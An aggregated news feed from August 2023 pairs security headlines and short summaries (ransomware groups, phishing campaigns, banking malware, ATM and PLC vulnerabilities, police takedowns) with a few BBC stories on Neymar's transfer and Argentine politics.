            A phishing campaign employing QR codes targeted a leading energy company in the US, cybersecurity firm Cofense reported. Starting from May 2023, researchers from Cofense discovered a large-scale phishing campaign using QR codes in attacks aimed at stealing the Microsoft credentials of users from multiple industries One of the organizations targeted by hackers is a […]

            The post A massive phishing campaign using QR codes targets the energy sector appeared first on Security Affairs.

            "

            Autosummary: Other top 4 targeted industries include Manufacturing, Insurance, Technology, and Financial Services seeing 15%, 9%, 7%, and 6% of the campaign traffic respectively. "


            Neymar: Does Brazil superstar leave Paris St-Germain with a legacy unfulfilled?

            latam
            2023-08-16 https://www.bbc.co.uk/sport/football/66505930?at_medium=RSS&at_campaign=KARANGA
            BBC Sport charts the career of Brazil legend Neymar as he departs Paris St-Germain and European football to join Al-Hilal in Saudi Arabia. "

            Autosummary: Neymar won trophies at PSG but also struggled with injuries 2021-23 - Ups and downs as end approaches Neymar once again teamed up with former Barcelona team-mate Messi when the Argentina star joined PSG in August 2021, but that season was a disappointing one for Neymar as he finished with 13 goals in all competitions - his worst return since moving to Europe. 2016 - Record-breaking season and Olympic gold Neymar, Messi and Suarez continued to be one of the most deadly strike trios in club football and in 2015-16 they combined to score 131 goals - the most in a season for an attacking trio in Spanish football history. 2013 - Barcelona and Brazil success Luis Suarez, Lionel Messi and Neymar became a formidable attacking trio at Barcelona Having helped Santos win the Copa Libertadores in 2011 - their first since 1963 - Neymar joined Barcelona after being linked with a string of top European clubs. "


            Ransomware: To pay or not to pay

            exploits
            2023-08-15 https://www.helpnetsecurity.com/2023/08/15/ransom-paying/

            Comprehensive security plans and programs must focus on defense, but also on answering these key questions: “How will the organization respond to a ransomware attack?”, and “At what point will the option of paying the ransom be on the table?” What are the key considerations that must be made to reach an answer? Paying the ransom – key considerations 1. Paying funds cybercrime activity The more ransoms organizations pay, the more profitable ransomware attacks are … More

            The post Ransomware: To pay or not to pay appeared first on Help Net Security.

            "

            Autosummary: This includes:
            Educating employees on ransomware, how it gets into systems and how user accounts are targeted
            Running a regular patch management process, complemented with proactive red teaming
            Scheduling regular backups and regularly testing the backup and data recovery process
            Implementing segmentation across networks and systems to stop attacks from spreading once attackers gain a foothold
            On top of this, when organizations are building out their security programs, they must focus on how best to respond to attacks to minimize disruptions. When building out security programs, organizations must understand the cost of downtime per hour and the losses they stand to endure if a ransomware attack happens (this could relate to reputation, contractual obligations, share price and employee productivity). If you pay once, you’ll most likely get hit again: when an organization pays a ransom, the news circulates among cybercrime gangs and it makes it more likely that the business will get hit again. "


            Catching the Catphish: Join the Expert Webinar on Combating Credential Phishing

            financial
            2023-08-15 https://thehackernews.com/2023/08/catching-catphish-join-expert-webinar.html
            Is your organization constantly under threat from credential phishing? Even with comprehensive security awareness training, many employees still fall victim to credential phishing scams. The result? Cybercriminals gaining immediate and unhindered access to sensitive data, email accounts, and other applications. But what if you could outsmart these criminals and protect your organization? Join "

            Autosummary: Join Graham Cluley, renowned cybersecurity expert and host of the Smashing Security podcast, and Mike Britton, CISO at Abnormal Security, for an illuminating webinar that delves into the world of credential phishing and offers actionable insights. Understanding the Lure: How attackers manipulate victims into submitting credentials, employing tactics such as generative AI. "


            Malware Unleashed: Public Sector Hit in Sudden Surge, Reveals New Report

            exploits
            2023-08-15 https://thehackernews.com/2023/08/malware-unleashed-public-sector-hit-in.html
            The just-released BlackBerry Global Threat Intelligence Report reveals a 40% increase in cyberattacks against government and public service organizations versus the previous quarter. This includes public transit, utilities, schools, and other government services we rely on daily. With limited resources and often immature cyber defense programs, these publicly funded organizations are struggling "

            Autosummary: These actors typically target the United States, Europe, and South Korea, with a focus on targeting government agencies, military organizations, businesses, and financial institutions. His deep technical expertise includes penetration testing, security architectures, intrusion detection, and computer forensics, providing consultancy to large government and private organizations. "


            Gigabud RAT Android Banking Malware Targets Institutions Across Countries

            financial exploits
            2023-08-15 https://thehackernews.com/2023/08/gigabud-rat-android-banking-malware.html
            Account holders at numerous financial institutions in Thailand, Indonesia, Vietnam, the Philippines, and Peru are being targeted by an Android banking malware called Gigabud RAT. "One of Gigabud RAT's unique features is that it doesn't execute any malicious actions until the user is authorized into the malicious application by a fraudster, [...] which makes it harder to detect," Group-IB "

            Autosummary: On the other hand, Gigabud.Loan functions as a tool to collect personal information such as full name, identity number, national identity document photo, digital signature, education, income info, bank card information, and phone number under the guise of submitting a loan request to the bank. While Android devices have the "Install from Unknown Sources" setting disabled by default as a security measure to prevent the installation of apps from untrusted sources, the operating system allows other apps installed on the device, such as web browsers, email clients, file managers, and messaging apps, to request the "REQUEST_INSTALL_PACKAGES" permission. "


            Raccoon Stealer malware returns with new stealthier version

            exploits
            2023-08-15 https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-returns-with-new-stealthier-version/
            The developers of Raccoon Stealer information-stealing malware have ended their 6-month hiatus from hacker forums to promote a new 2.3.0 version of the malware to cyber criminals. [...] "

            Autosummary: The malware steals data from over 60 applications, including login credentials, credit card information, browsing history, cookies, and cryptocurrency wallet accounts. "


            Back to school security against ransomware attacks on K-12 and colleges

            exploits ransomware
            2023-08-15 https://www.bleepingcomputer.com/news/security/back-to-school-security-against-ransomware-attacks-on-k-12-and-colleges/
            As we get back to school, K-12 and colleges are increasingly at risk from ransomware and data theft attacks. Learn more from Specops Software on the steps IT teams at education institutes can take to protect their organizations from disruption and stolen data. [...] "

            Autosummary: Protect against catastrophe with up-to-date offline backups. If the worst has happened, and a ransomware attack has taken down a school’s network, up-to-date and offline-stored backups are crucial to getting the students back in the classroom. The FBI (Federal Bureau of Investigation), CISA, and the MS-ISAC warned about Vice Society and the threat it poses to education sectors in a joint Cybersecurity Advisory (CSA): “School districts with limited cybersecurity capabilities and constrained resources are often the most vulnerable; however, the opportunistic targeting often seen with cyber criminals can still put school districts with robust cybersecurity programs at risk.”
            Remote connections – Remote Desktop Protocol (RDP), Teamviewer, VNC, etc.
            Persistent installations – Unexpected startup programs or scheduled task creations.
            Specops Password Policy with Breached Password Protection is popular with schools, universities, and local governments due to cost-effectiveness, quick implementation, and ease of end-user use. "


            Multiple Flaws Found in ScrutisWeb Software Exposes ATMs to Remote Hacking

            financial
            2023-08-15 https://thehackernews.com/2023/08/multiple-flaws-found-in-scrutisweb.html
            Four security vulnerabilities in the ScrutisWeb ATM fleet monitoring software made by Iagona could be exploited to remotely break into ATMs, upload arbitrary files, and even reboot the terminals. The shortcomings were discovered by the Synack Red Team (SRT) following a client engagement. The issues have been addressed in ScrutisWeb version 2.1.38. "Successful exploitation of these "

            Autosummary: Details of the four flaws are as follows - CVE-2023-33871 (CVSS score: 7.5) - A directory traversal vulnerability that could allow an unauthenticated user to directly access any file outside the server's webroot. "


            Monti Ransomware Returns with New Linux Variant and Enhanced Evasion Tactics

            exploits ransomware industry
            2023-08-15 https://thehackernews.com/2023/08/monti-ransomware-returns-with-new-linux.html
            The threat actors behind the Monti ransomware have resurfaced after a two-month break with a new Linux version of the encryptor in its attacks targeting government and legal sectors. Monti emerged in June 2022, weeks after the Conti ransomware group shut down its operations, deliberately imitating the tactics and tools associated with the latter, including its leaked source code. Not anymore. "

            Autosummary: "


            Cybercriminals Abusing Cloudflare R2 for Hosting Phishing Pages, Experts Warn

            financial ciber
            2023-08-15 https://thehackernews.com/2023/08/cybercriminals-abusing-cloudflare-r2.html
            Threat actors' use of Cloudflare R2 to host phishing pages has witnessed a 61-fold increase over the past six months. "The majority of the phishing campaigns target Microsoft login credentials, although there are some pages targeting Adobe, Dropbox, and other cloud apps," Netskope security researcher Jan Michael said. Cloudflare R2, analogous to Amazon Web Service S3, Google Cloud Storage, and "

            Autosummary: "


            PCMag ranks Malwarebytes #1 cybersecurity vendor

            exploits ciber
            2023-08-15 https://www.malwarebytes.com/blog/business/2023/08/pcmag-ranks-malwarebytes-1-cybersecurity-vendor

            Categories: Business

            PCMag readers named Malwarebytes the #1 most-recommended security software vendor in its list of Best Tech Brands for 2023. 

            (Read more...)

            The post PCMag ranks Malwarebytes #1 cybersecurity vendor appeared first on Malwarebytes Labs.

            "

            Autosummary: Award-winning EDR Solution. Malwarebytes EDR has been recognized for having the Best Support, being Easiest to Do Business With, having the Easiest Admin, being the Easiest to Use, Most Implementable, and the Easiest to Set Up. – Dennis Davis, IT Systems Manager, Drummond. Try Malwarebytes for Business today. Most of all, we appreciate the trust and support of our customers in making Malwarebytes the #1 cybersecurity solution for IT teams and MSPs. "


            Ford says it’s safe to drive its cars with a WiFi vulnerability

            exploits
            2023-08-15 https://www.malwarebytes.com/blog/news/2023/08/ford-says-it-is-safe-to-drive-the-cars-with-a-wifi-vulnerability

            Categories: Exploits and vulnerabilities

            Categories: News

            Tags: Ford

            Tags: Lincoln

            Tags: SYNC 3

            Tags: CVE-2023-29468

            Tags: TI WLink

            Tags: MCP driver

            A vulnerability in the SYNC 3 infotainment will not have a negative effect on driving safety, says Ford.

            (Read more...)

            The post Ford says it’s safe to drive its cars with a WiFi vulnerability appeared first on Malwarebytes Labs.

            "

            Autosummary: And even if an attacker were to gain RCE on the SYNC 3 system using this vulnerability, the potential damage would be limited, since the system is isolated from critical control functions like steering, throttling, and braking. "


            25 most popular websites vs Malwarebytes Browser Guard

            exploits
            2023-08-15 https://www.malwarebytes.com/blog/personal/2023/08/25-most-popular-websites-vs-malwarebytes-browser-guard

            Categories: News

            Categories: Personal

            We put Malwarebytes Browser Guard up against the top 25 websites. It knocked out 172 trackers and other unwanted items.

            (Read more...)

            The post 25 most popular websites vs Malwarebytes Browser Guard appeared first on Malwarebytes Labs.

            "

            Autosummary: Cross-site ad tracking follows you from site to site and builds up a rough picture of your likes, dislikes, and demographics, which is then used to help ad providers choose relevant, targeted ads to show you (or at least, that's the theory.) Among many other things, the third-party components are allowed to alter the code of the page you're looking at in any way they like, they can all see anything you type into a form on that page, even if you don't submit it, and they can copy any authentication cookies you have for that site too, which effectively means they can steal your password. Efficient threat distribution: the first is that ad distribution networks—the amazingly efficient, just-in-time auction houses that fill ad slots as a page loads—are just as good at distributing scams, links to phishing sites, and malware downloads, as they are at distributing ads. "


            Monti Ransomware gang launched a new Linux encryptor

            exploits ransomware
            2023-08-15 https://securityaffairs.com/149539/cyber-crime/monti-ransomware-news-linux-variant.html

            Monti Ransomware operators returned, after a two-month pause, with a new Linux variant of their encryptor. The Monti ransomware operators returned, after a two-month break, with a new Linux version of the encryptor. The variant was employed in attacks aimed at organizations in government and legal sectors. The Monti group has been active since June 2022, […]

            The post Monti Ransomware gang launched a new Linux encryptor appeared first on Security Affairs.

            "

            Autosummary: Argument: Description
            –help: Displays arguments usage
            –path <string>: Path to be encrypted
            –whitelist <string>: List of VMs to be skipped
            –vmkill: Option to kill virtual machine (VM)
            –detach: Detach from terminal
            –size: removed
            –log: removed
            –vmlist: removed
            The researchers observed that the developers also tampered with the /etc/motd and index.html files, replacing their contents with a ransom note. "


            Hacking ATMs by exploiting flaws in ScrutisWeb ATM fleet software

            financial exploits
            2023-08-15 https://securityaffairs.com/149533/hacking/scrutisweb-atm-sw-atms.html

            Researchers found several flaws in the ScrutisWeb ATM fleet monitoring software that can expose ATMs to hacking. Researchers from the Synack Red Team found multiple flaws (CVE-2023-33871, CVE-2023-38257, CVE-2023-35763 and CVE-2023-35189) in the ScrutisWeb ATM fleet monitoring software that can be exploited to remotely hack ATMs. ScrutisWeb software is developed by Iagona, it allows to […]

            The post Hacking ATMs by exploiting flaws in ScrutisWeb ATM fleet software appeared first on Security Affairs.

            "

            Autosummary: "


            Harrison Ford has a new Peruvian snake species named after him

            latam
            2023-08-15 https://www.bbc.co.uk/news/world-us-canada-66516576?at_medium=RSS&at_campaign=KARANGA
            Unlike his Indiana Jones character, Ford says he likes snakes and called the discovery "humbling". "

            Autosummary: "


            How Argentina learned to love the US dollar

            latam
            2023-08-15 https://www.bbc.co.uk/news/world-latin-america-66507826?at_medium=RSS&at_campaign=KARANGA
            Stuffing your greenbacks into the "mattress bank" is a way of life for many Argentines.



            How manufacturers can navigate cybersecurity regulations amid NIST 2.0

            industry ciber
            2023-08-14 https://www.helpnetsecurity.com/2023/08/14/cybersecurity-regulations-nist-2-0-video/

            The National Institute of Standards and Technology (NIST) released a discussion draft for possible Cybersecurity Framework (CSF) changes earlier this year. The proposed changes aim to help increase the CSF’s clarity and bring the updated version closer to national and international cybersecurity standards and practices. In this Help Net Security video, Ahmik Hindman, Sr. Network & Security Solution Consultant at Rockwell Automation, discusses the evolving cybersecurity landscape and what the new cybersecurity framework could mean … More

            The post How manufacturers can navigate cybersecurity regulations amid NIST 2.0 appeared first on Help Net Security.



            Action1 platform update bridges the gap between vulnerability discovery and remediation

            exploits
            2023-08-14 https://www.helpnetsecurity.com/2023/08/14/action1-platform-update/

            Action1 Corporation has released a new version of its solution. The updated Action1 patch management platform brings together vulnerability discovery and remediation, helping enterprises fortify their defenses against threats such as ransomware infections and security breaches. The real-time detection of vulnerabilities across the enterprise fleet of endpoints is based on data about 200,000+ vulnerabilities from multiple external threat intelligence sources, provides instant visibility into them for better prioritization decisions, and allows automated remediation of these … More

            The post Action1 platform update bridges the gap between vulnerability discovery and remediation appeared first on Help Net Security.



            Ongoing Xurum Attacks on E-commerce Sites Exploiting Critical Magento 2 Vulnerability

            exploits
            2023-08-14 https://thehackernews.com/2023/08/ongoing-xurum-attacks-on-e-commerce.html
            E-commerce sites using Adobe's Magento 2 software are the target of an ongoing campaign that has been active since at least January 2023. The attacks, dubbed Xurum by Akamai, leverage a now-patched critical security flaw (CVE-2022-24086, CVSS score: 9.8) in Adobe Commerce and Magento Open Source that, if successfully exploited, could lead to arbitrary code execution. "The attacker seems to be



            New Financial Malware "JanelaRAT" Targets Latin American Users

            financial exploits
            2023-08-14 https://thehackernews.com/2023/08/new-financial-malware-janelarat-targets.html
            Users in Latin America (LATAM) are the target of a financial malware called JanelaRAT that's capable of capturing sensitive information from compromised Microsoft Windows systems. "JanelaRAT mainly targets financial and cryptocurrency data from LATAM bank and financial institutions," Zscaler ThreatLabz researchers Gaetano Pellegrino and Sudeep Singh said, adding it "abuses DLL side-loading

            Autosummary: "JanelaRAT mainly targets financial and cryptocurrency data from LATAM bank and financial institutions," Zscaler ThreatLabz researchers Gaetano Pellegrino and Sudeep Singh said, adding it "abuses DLL side-loading techniques from legitimate sources (like VMWare and Microsoft) to evade endpoint detection."


            FBI warns of increasing cryptocurrency recovery scams

            financial
            2023-08-14 https://www.bleepingcomputer.com/news/security/fbi-warns-of-increasing-cryptocurrency-recovery-scams/
            The FBI is warning of an increase in scammers pretending to be recovery companies that can help victims of cryptocurrency investment scams recover lost assets. [...]

            Autosummary: [Image: comment promoting fake crypto recovery services (BleepingComputer)] While social media, especially Twitter, has been attempting to crack down on these scams, they are still plagued by cryptocurrency support and recovery scams.


            Monti ransomware targets VMware ESXi servers with new Linux locker

            exploits ransomware
            2023-08-14 https://www.bleepingcomputer.com/news/security/monti-ransomware-targets-vmware-esxi-servers-with-new-linux-locker/
            The Monti ransomware has returned to action after a two-month hiatus, now targeting primarily legal and government organizations, and VMware ESXi servers using a new Linux variant that is vastly different from its predecessors. [...]

            Autosummary: [Image: code similarity rate on BinDiff (Trend Micro)] Among the significant modifications that Trend Micro observed are the following: removal of the ‘--size’, ‘--log’ and ‘--vmlist’ parameters, and addition of a new ‘-type=soft’ parameter to terminate ESXi virtual machines (VMs) in a subtler manner that is more likely to evade detection.


            QwixxRAT: New Remote Access Trojan Emerges via Telegram and Discord

            exploits
            2023-08-14 https://thehackernews.com/2023/08/qwixxrat-new-remote-access-trojan.html
            A new remote access trojan (RAT) called QwixxRAT is being advertised for sale by its threat actor through Telegram and Discord platforms. "Once installed on the victim's Windows platform machines, the RAT stealthily collects sensitive data, which is then sent to the attacker's Telegram bot, providing them with unauthorized access to the victim's sensitive information," Uptycs said in a new



            Over 100K hacking forums accounts exposed by info-stealing malware

            exploits
            2023-08-14 https://www.bleepingcomputer.com/news/security/over-100k-hacking-forums-accounts-exposed-by-info-stealing-malware/
            Researchers discovered 120,000 infected systems that contained credentials for cybercrime forums. Many of the computers belong to hackers, the researchers say. [...]

            Autosummary: Identifying the owners of those compromised computers as hackers, or at least hacker enthusiasts, was possible by looking at the data from the info-stealer logs, which also exposed the individual’s real identity:
            - Additional credentials found on the computers (additional emails, usernames)
            - Auto-fill data containing personal information (names, addresses, phone numbers)
            - System information (computer names, IP addresses)
            In a previous blog post, Hudson Rock describes how a prominent threat actor called La_Citrix, known for selling Citrix/VPN/RDP access to companies, accidentally infected their computer.


            Javier Milei: Trump admirer leads race for Argentina presidency

            latam
            2023-08-14 https://www.bbc.co.uk/news/world-latin-america-66496816?at_medium=RSS&at_campaign=KARANGA
            Javier Milei gets the biggest number of votes in a primary considered a key indicator for the election.



            Neymar transfer news: Al-Hilal agree deal with Paris St-Germain for Brazil forward

            latam
            2023-08-14 https://www.bbc.co.uk/sport/football/66495833?at_medium=RSS&at_campaign=KARANGA
            Paris St-Germain agree a deal to sell Neymar to Saudi Pro League side Al-Hilal for a fee of about 90m euros (£77.6m) plus add-ons.

            Autosummary: [Image: Neymar scored for Paris St-Germain in their pre-season friendly against Jeonbuk Hyundai Motors] Paris St-Germain have agreed a deal to sell Brazil forward Neymar to Saudi Pro League side Al-Hilal for about 90m euros (£77.6m) plus add-ons. "A few months ago when Cristiano [Ronaldo] was the only one to go, no-one thought this many top, top players would play in the Saudi league," the City manager said.


            Week in review: 8 free cybersecurity docus, vulnerable Intel Core processors, Black Hat USA 2023

            ciber
            2023-08-13 https://www.helpnetsecurity.com/2023/08/13/week-in-review-8-free-cybersecurity-docus-vulnerable-intel-core-processors-black-hat-usa-2023/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Zoom CISO Michael Adams discusses cybersecurity threats, solutions, and the future In this Help Net Security interview, we delve into the world of cybersecurity with Michael Adams, the CISO at Zoom. Adams analyzes how organizations grapple with the effects of workforce shortages and remote work complications, offering insights into best practices for safeguarding products and services in this challenging era. … More

            The post Week in review: 8 free cybersecurity docus, vulnerable Intel Core processors, Black Hat USA 2023 appeared first on Help Net Security.


            Autosummary: New infosec products of the week: August 11, 2023: Here’s a look at the most interesting products from the past week, featuring releases from Adaptive Shield, LastPass, NetSPI, Solvo, ThreatConnect, and Vicarius.
            Downfall attacks can gather passwords, encryption keys from Intel processors: A variety of Intel Core processors and the devices using them are vulnerable to “Downfall”, a new class of attacks made possible by CVE-2022-40982, which enables attackers to access and steal sensitive data such as passwords, encryption keys, and private data from other users on the same personal or cloud computer.


            UK gov keeps repeating its voter registration website is NOT a scam

            financial
            2023-08-13 https://www.bleepingcomputer.com/news/security/uk-gov-keeps-repeating-its-voter-registration-website-is-not-a-scam/
            Every year local government bodies or councils across Britain contact residents, asking them to update their voter details on the electoral register if these have changed. To do so, residents are asked to visit HouseholdResponse.com, a domain that looks anything but official and has often confused people, who mistake it for a scam. [...]

            Autosummary: Furthermore, the rep explains, because voter records on the "open register" are often reported to credit bureaus and used for online identity verification, those who do not keep their details up to date could face problems when applying for credit or utilities: "You may also have difficulty in getting credit for mortgages, credit cards and mobile phones, as the register is often used to carry out credit checks." Some caution that the confusion associated with the domain can be leveraged by scammers to create lookalike phishing domains. [Image: residents caution against potential phishing domains] "For info, someone has camped on householdresponse(s).com for ads, it could cause confusion and also someone could use for a phishing attack," cautioned UK-based Jason Dean, who works in the banking software industry.


            MaginotDNS attacks exploit weak checks for DNS cache poisoning

            exploits
            2023-08-13 https://www.bleepingcomputer.com/news/security/maginotdns-attacks-exploit-weak-checks-for-dns-cache-poisoning/
            A team of researchers from UC Irvine and Tsinghua University has developed a new powerful cache poisoning attack named "MaginotDNS," that targets Conditional DNS (CDNS) resolvers and can compromise entire top-level domains (TLDs). [...]

            Autosummary: Researchers identified inconsistencies in the bailiwick checking of prominent DNS software, including BIND9 (CVE-2021-25220), Knot Resolver (CVE-2022-32983), Microsoft DNS, and Technitium (CVE-2021-43105).


            Knight ransomware distributed in fake Tripadvisor complaint emails

            exploits ransomware
            2023-08-12 https://www.bleepingcomputer.com/news/security/knight-ransomware-distributed-in-fake-tripadvisor-complaint-emails/
            The Knight ransomware is being distributed in an ongoing spam campaign that pretends to be TripAdvisor complaints. [...]

            Autosummary: [Image: different Cyclops ransomware encryptors (Source: BleepingComputer)] In addition to their normal encryptors, the operation offers a "lite" version for use in spam and spray-and-pray mass distribution campaigns targeting large numbers of users. When encrypting files, it will append the .knight_l extension to encrypted files' names, where the "l" portion likely stands for "lite."


            Ford says cars with WiFi vulnerability still safe to drive

            exploits
            2023-08-12 https://www.bleepingcomputer.com/news/security/ford-says-cars-with-wifi-vulnerability-still-safe-to-drive/
            Ford is warning of a buffer overflow vulnerability in its SYNC3 infotainment system used in many Ford and Lincoln vehicles, which could allow remote code execution, but says that vehicle driving safety isn't impacted. [...]



            Threat intelligence’s key role in mitigating malware threats

            exploits
            2023-08-11 https://www.helpnetsecurity.com/2023/08/11/threat-intelligence-investments/

            Malware, being one of the most prevalent and pervasive initial threat vectors, continues to adapt and become more sophisticated, according to OPSWAT.
            Crucial role of threat intelligence
            Threat actors leverage malware as an initial foothold to infiltrate targeted infrastructures and move laterally to gain long-term access, cause damage, or exfiltrate data and trade secrets. To combat these threats effectively, organizations rely on actionable threat intelligence gathered through sandboxes and advanced malware analysis technologies and processes. … More

            The post Threat intelligence’s key role in mitigating malware threats appeared first on Help Net Security.



            Cybersecurity as a global, multi-sector activity with Mihoko Matsubara

            ciber
            2023-08-11 https://www.helpnetsecurity.com/2023/08/11/mihoko-matsubara-cybersecurity-activity-podcast/

            Like many leaders in the cybersecurity space, the professional journey of Mihoko Matsubara did not necessarily begin with securing devices or technology. However, once she discovered it, she was hooked. Discussing her career path with the Left to Our Own Devices podcast and how it opened her eyes to a world of security, Mihoko explained how she went from curiosity to university in Washington, D.C., became a Senior Security Analyst at Hitachi, then VP Public … More

            The post Cybersecurity as a global, multi-sector activity with Mihoko Matsubara appeared first on Help Net Security.


            Autosummary: Discussing her career path with the Left to Our Own Devices podcast and how it opened her eyes to a world of security, Mihoko explained how she went from curiosity to university in Washington, D.C., became a Senior Security Analyst at Hitachi, then VP Public Sector Chief Security Officer at Palo Alto, and to her current position as the Chief Cybersecurity Strategist at NTT Japan. “Everybody, including the central government, local government, big companies, academia saw it as a wakeup call,” said Mihoko.


            CISA Adds Microsoft .NET Vulnerability to KEV Catalog Due to Active Exploitation

            exploits
            2023-08-11 https://thehackernews.com/2023/08/cisa-adds-microsoft-net-vulnerability.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched security flaw in Microsoft's .NET and Visual Studio products to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2023-38180 (CVSS score: 7.5), the high-severity flaw relates to a case of denial-of-service (DoS) impacting .NET and Visual Studio. It



            Researchers Shed Light on APT31's Advanced Backdoors and Data Exfiltration Tactics

            industry
            2023-08-11 https://thehackernews.com/2023/08/researchers-shed-light-on-apt31s.html
            The Chinese threat actor known as APT31 (aka Bronze Vinewood, Judgement Panda, or Violet Typhoon) has been linked to a set of advanced backdoors that are capable of exfiltrating harvested sensitive information to Dropbox. The malware is part of a broader collection of more than 15 implants that have been put to use by the adversary in attacks targeting industrial organizations in Eastern Europe



            New SystemBC Malware Variant Targets Southern African Power Company

            exploits
            2023-08-11 https://thehackernews.com/2023/08/new-systembc-malware-variant-targets.html
            An unknown threat actor has been linked to a cyber attack on a power generation company in southern Africa with a new variant of the SystemBC malware called DroxiDat as a precursor to a suspected ransomware attack. "The proxy-capable backdoor was deployed alongside Cobalt Strike Beacons in a South African nation's critical infrastructure," Kurt Baumgartner, principal security researcher at

            Autosummary: "Ransomware will continue to disrupt industrial operations, whether through the integration of operational technology (OT) kill processes into ransomware strains, flattened networks allowing ransomware to spread into OT environments, or precautionary shutdowns of production by operators to prevent ransomware from spreading to industrial control systems," the company assessed with high confidence.


            Police seize LOLEK bulletproof service for hosting malware

            exploits
            2023-08-11 https://www.bleepingcomputer.com/news/security/police-seize-lolek-bulletproof-service-for-hosting-malware/
            Police have taken down the Lolek bulletproof hosting provider, arresting five individuals and seizing servers for facilitating malicious activities, including DDoS attacks and malware distribution. [...]

            Autosummary: In 2018, the Dutch police seized MaxiDed for hosting DDoS botnets, cyber-espionage, malvertising, spam, and malware operations.


            Industrial PLCs worldwide impacted by CODESYS V3 RCE flaws

            industry
            2023-08-11 https://www.bleepingcomputer.com/news/security/industrial-plcs-worldwide-impacted-by-codesys-v3-rce-flaws/
            Millions of PLCs (programmable logic controllers) used in industrial environments worldwide are at risk from 15 vulnerabilities in the CODESYS V3 software development kit, allowing remote code execution (RCE) and denial of service (DoS) attacks. [...]



            LOLEKHosted admin arrested for aiding Netwalker ransomware gang

            exploits ransomware
            2023-08-11 https://www.bleepingcomputer.com/news/security/lolekhosted-admin-arrested-for-aiding-netwalker-ransomware-gang/
            Police have taken down the Lolek bulletproof hosting provider, arresting five individuals and seizing servers for allegedly facilitating Netwalker ransomware attacks and other malicious activities. [...]

            Autosummary: Europol says that Lolek was seized as cybercriminals used its servers to launch DDoS attacks, distribute information-stealing malware, host command and control servers, host fake online shops, and conduct spam campaigns.


            The Week in Ransomware - August 11th 2023 - Targeting Healthcare

            exploits ransomware
            2023-08-11 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-11th-2023-targeting-healthcare/
            While some ransomware operations claim not to target hospitals, one relatively new ransomware gang named Rhysida doesn't seem to care. [...]

            Autosummary: Contributors and those who provided new ransomware information and stories this week include: @Seifreed, @struppigel, @Ionut_Ilascu, @serghei, @LawrenceAbrams, @malwrhunterteam, @billtoulas, @demonslay335, @BleepinComputer, @HHSGov, @TrendMicro, @TalosSecurity, @_CPResearch_, @IRS_CI, and @pcrisk.
            August 7th 2023: Talos assesses with high confidence that this threat actor is targeting victims in English-speaking countries, Bulgaria, China and Vietnam, as the actor’s GitHub account, “nguyenvietphat,” has ransomware notes written in these countries’ languages.


            Several hospitals still counting the cost of widespread ransomware attack

            exploits ransomware
            2023-08-11 https://www.malwarebytes.com/blog/news/2023/08/several-hospitals-still-counting-the-cost-of-widespread-ransomware-attack

            Categories: News. Tags: hospital, healthcare, ransomware, hijack, network, compromise, data, ambulance, service, redirect

            A widespread ransomware attack affecting 16 hospitals last week has led to ongoing cleanup efforts.


            The post Several hospitals still counting the cost of widespread ransomware attack appeared first on Malwarebytes Labs.


            Autosummary: When it first made an appearance on our Ransomware Review in July of this year, we said the following: Rhysida, a new ransomware gang claiming to be a "cybersecurity team," has been in operation since May 17, 2023, making headlines for their high-profile attack against the Chilean Army. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. They primarily attack education, government, manufacturing, and technology and managed service provider sectors; however, there have been recent attacks against the Healthcare and Public Health (HPH) sector. The healthcare facilities located in Connecticut, Pennsylvania, Rhode Island, and California had the ransomware attack confirmed by the FBI.


            Old exploit kits still kicking around in 2023

            exploits
            2023-08-11 https://www.malwarebytes.com/blog/threat-intelligence/2023/08/old-exploit-kits-still-kicking-around-in-2023

            Categories: Threat Intelligence. Tags: exploit kits, eks, rigek, purplefoxek

            Internet Explorer may be a thing of the past, but there are still users and threat actors trying to deliver drive-by downloads.


            The post Old exploit kits still kicking around in 2023 appeared first on Malwarebytes Labs.



            Will AI kill cybersecurity jobs?

            ciber
            2023-08-10 https://www.helpnetsecurity.com/2023/08/10/cybersecurity-jobs-demand/

            Some ten years ago, the authors of The Second Machine Age wrote that “computers and other digital advances are doing for mental power—the ability to use our brains to understand and shape our environments—what the steam engine and its descendants did for muscle power.” Many physical jobs were lost to machines, and according to the authors computers and IT technology were going to do the same to jobs that require cognitive skills. Should cybersecurity practitioners … More

            The post Will AI kill cybersecurity jobs? appeared first on Help Net Security.


            Autosummary: In 1980, senior management of Wells Fargo predicted that due to growth in electronic transactions, the number of bank branches would shrink dramatically, whilst the remaining branches would have “few, if any, support staff members”; and by 1984 more than 40% of US households owned ATM cards. And indeed, according to the AI in Medical Imaging Market report, during the period of 2021–2030, the global market for AI in medical imaging is expected to grow at a CAGR of 36.87%, from an estimated $1.24 billion in 2021 to an estimated $20.9 billion.


            Learning from past healthcare breaches to fortify future cybersecurity strategies

            ciber
            2023-08-10 https://www.helpnetsecurity.com/2023/08/10/shenny-sheth-healthcare-cyber-risks/

            In the face of rising cyber threats, the healthcare sector has become a hotbed for cyberattacks. Given the gravity of this situation, we sat down with Shenny Sheth, Deputy CISO at Centura Health, who sheds light on the contributing factors making healthcare organizations vulnerable, the role of legacy IT systems, common network monitoring mistakes, patterns in data breaches, and the financial implications of these attacks. This conversation also delves into the complexities of partnerships and … More

            The post Learning from past healthcare breaches to fortify future cybersecurity strategies appeared first on Help Net Security.


            Autosummary: As Centura Health does, US-based organizations could stave off non-compliance with laws, regulations or ethical standards, including conflicts of interest, which results in censure from regulators, litigation and/or other adverse impacts, by adopting a proper compliance framework such as the HITRUST Common Security Framework (HITRUST CSF), which provides structure for the practices, accountabilities and sufficiently resourced cybersecurity program that serve data confidentiality and privacy obligations. In light of that learning, healthcare organizations must: (1) embrace plans to shift away from unsupported (or end-of-life) software in service of critical infrastructure and national critical functions (NCF), and (2) move to password-less, multi-factor, multi-device vouching services to deter malicious Initial Access or Remote Code Execution (RCE) and prevent entry into the critical infrastructure and NCF space.


            Interpol Busts Phishing-as-a-Service Platform "16Shop," Leading to 3 Arrests

            financial
            2023-08-10 https://thehackernews.com/2023/08/interpol-busts-phishing-as-service.html
            Interpol has announced the takedown of a phishing-as-a-service (PhaaS) platform called 16Shop, in addition to the arrests of three individuals in Indonesia and Japan. 16Shop specialized in the sales of phishing kits that other cybercriminals can purchase to mount phishing attacks on a large scale, ultimately facilitating the theft of credentials and payment details from users of popular services

